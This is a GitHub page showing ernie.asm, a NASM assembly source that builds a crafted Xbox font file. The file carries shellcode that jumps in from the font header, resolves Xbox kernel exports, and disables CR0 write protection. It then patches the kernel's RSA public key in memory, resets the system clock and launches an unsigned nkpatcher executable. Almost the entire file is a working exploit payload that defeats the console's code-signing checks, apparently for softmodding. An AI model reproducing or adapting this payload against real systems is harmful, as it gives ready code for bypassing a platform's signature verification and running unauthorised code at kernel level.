-
Notifications
You must be signed in to change notification settings - Fork 84
/
ernie.asm
185 lines (185 loc) · 4.2 KB
/
ernie.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
;;;
;;; Compile: nasm -o ernie.xtf ernie.asm
;;;
BITS 32
header:
db 'XTF0'
dd 32
db 'Xbox Book'
times 32-9 db 0
.data1len:
jmp short shellcode
dw 10h
dd 0
.data2num:
dd 1 ; Can be tuned (to fill memory holes) in case of exploit instability
dd 0
shellcode:
jmp near start
align 4, db 0
kexports:
HalReturnToFirmware dd 49
;HalWriteSMBusValue dd 50
LaunchDataPage dd 164
MmAllocateContiguousMemory dd 165
MmPersistContiguousMemory dd 178
XePublicKeyData dd 355
KeQuerySystemTime dd 128
NtSetSystemTime dd 228
RtlTimeFieldsToTime dd 304
dd 0
mintimefields
dw 2022 ; Year
dw 1 ; Month
dw 1 ; Day
dw 12 ; Hour
dw 0 ; Minute
dw 0 ; Second
dw 0 ; Milliseconds
dw 0 ; Weekday (ignored)
maxtimefields
dw 9999 ; Year
dw 1 ; Month
dw 1 ; Day
dw 12 ; Hour
dw 0 ; Minute
dw 0 ; Second
dw 0 ; Milliseconds
dw 0 ; Weekday (ignored)
xbestr db '\Device\Harddisk0\Partition2\nkpatcher;default.xbe',0
times 8 db 0
XBESTRLEN equ $-xbestr
start:
call base
base:
pop ebp
cld
mov esi,80010000h ; Kernel here
mov eax,[esi+3Ch]
mov ebx,[esi+eax+78h]
add ebx,esi
mov edx,[ebx+1Ch]
add edx,esi
lea edi,[ebp+kexports-base]
getexports:
mov ecx,[edi]
jecxz .done
sub ecx,[ebx+10h]
mov eax,[edx+4*ecx]
test eax,eax
jz .empty
add eax,esi
.empty:
stosd
jmp getexports
.done:
; blinkled:
; mov edi,[ebp+HalWriteSMBusValue-base]
; push 0A0h
; push byte 0
; push byte 8
; push byte 20h
; call edi
; push byte 1
; push byte 0
; push byte 7
; push byte 20h
; call edi
patchpublickey:
mov ebx,[ebp+XePublicKeyData-base]
test ebx,ebx
jnz .chk
.searchkey:
mov ebx,esi
inc esi
.chk:
cmp dword [ebx],31415352h
jne .searchkey
cmp dword [ebx+10h],10001h
jne .searchkey
.searchkeyend:
inc ebx
cmp dword [ebx],0A44B1BBDh
jne .searchkeyend
pushf
cli
mov ecx,cr0
push ecx
and ecx,0FFFEFFFFh
mov cr0,ecx
xor dword [ebx],2DD78BD6h
pop ecx
mov cr0,ecx
popf
clockcheck:
xor eax,eax
push eax
push eax
mov ebx,esp ; space for current time
push eax
push eax
mov esi,esp ; space for minimum time
push eax
push eax
mov edi,esp ; space for maximum time
push ebx
call dword [ebp+KeQuerySystemTime-base]
push esi
lea eax,[ebp+mintimefields-base]
push eax
call dword [ebp+RtlTimeFieldsToTime-base]
test eax,eax
jz .bailout
mov eax,[ebx]
mov edx,[ebx+4]
sub eax,[esi]
sbb edx,[esi+4]
jc .setclock
push edi
lea eax,[ebp+maxtimefields-base]
push eax
call dword [ebp+RtlTimeFieldsToTime-base]
test eax,eax
jz .bailout
mov eax,[ebx]
mov edx,[ebx+4]
sub eax,[edi]
sbb edx,[edi+4]
jc .clockok
.setclock:
push byte 0
push esi
call dword [ebp+NtSetSystemTime-base]
.clockok:
.bailout:
add esp,byte 8+8+8
launchxbe:
mov esi,[ebp+LaunchDataPage-base]
mov edi,1000h
mov ebx,[esi]
test ebx,ebx
jnz .memok
push edi
call dword [ebp+MmAllocateContiguousMemory-base]
mov ebx,eax
mov [esi],eax
.memok:
push byte 1
push edi
push ebx
call dword [ebp+MmPersistContiguousMemory-base]
mov edi,ebx
xor eax,eax
mov ecx,400h
rep stosd
or dword [ebx],byte -1
mov [ebx+4],eax
lea edi,[ebx+8]
lea esi,[ebp+xbestr-base]
push byte XBESTRLEN
pop ecx
rep movsb
push byte 2
call dword [ebp+HalReturnToFirmware-base]
.inf:
jmp short .inf